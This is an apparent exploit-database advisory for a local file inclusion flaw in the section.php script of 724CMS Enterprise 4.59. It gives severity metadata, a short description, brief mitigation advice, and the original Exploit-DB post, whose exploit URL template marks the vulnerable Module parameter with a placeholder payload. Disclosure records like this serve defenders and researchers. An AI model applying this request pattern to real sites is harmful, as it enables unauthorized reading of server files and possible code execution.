724CMS Enterprise Version 4.59 (section.php) LFI Vulnerability

vendor:

Enterprise Version

by:

CoBRa_21

8,8

CVSS

HIGH

Local File Inclusion (LFI)

CWE

Product Name: Enterprise Version

Affected Version From: 4.59

Affected Version To: 4.59

Patch Exists: NO

Related CWE: N/A

CPE: 724cms.com

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

724CMS Enterprise Version 4.59 (section.php) LFI Vulnerability

A local file inclusion vulnerability exists in 724CMS Enterprise Version 4.59 due to improper validation of user-supplied input. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to include arbitrary local files on the web server, which can lead to the disclosure of sensitive information, or the execution of arbitrary code.

Mitigation:

Input validation should be used to prevent the inclusion of malicious files. Additionally, access to the application should be restricted to trusted users.

Source

Exploit-DB raw data:

-------------------------------------------------------------------------------------------

724CMS Enterprise Version 4.59 (section.php) LFI Vulnerability

-------------------------------------------------------------------------------------------

Author: CoBRa_21

Mail: uyku_cu@windowslive.com

Script Name: 724CMS Enterprise Version 4.59

Download: http://724cms.com/

-------------------------------------------------------------------------------------------

Exploit:

http://localhost/[path]/section.php?Module_Text=CoBRa_21&ID=6&Lang=En&Nav=Section&Module= [LF&#304;]

-------------------------------------------------------------------------------------------

Thanks cyberlog ;)

-------------------------------------------------------------------------------------------